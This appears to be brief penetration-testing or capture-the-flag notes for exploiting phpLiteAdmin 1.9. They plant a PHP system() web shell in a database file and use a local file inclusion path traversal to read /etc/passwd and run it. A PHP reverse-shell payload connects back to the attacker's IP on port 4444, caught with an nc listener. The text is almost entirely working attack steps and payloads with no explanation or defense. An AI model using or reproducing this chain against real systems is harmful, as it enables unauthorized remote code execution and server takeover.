-------------------
> searchsploit phpLiteAdmin 1.9
-------------------
Create Database : hack.php
Create New table: hack (1 field)
Field: <?php echo system($_REQUEST ["cmd"]); ?>
Type: TEXT
Local File Inclusion (LFI)
http://xxx.com/manage.php?notes=/myNotes/../../../../../../../../etc/passwd
http://xxx.com/manage.php?notes=/myNotes/../../../../var/tmp/hack.php&cmd=ls
URL Encode this:
.. &cmd=php -r '$sock=fsockopen("$MyIP",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
nc -nvlp 4444
whoami ..www-data
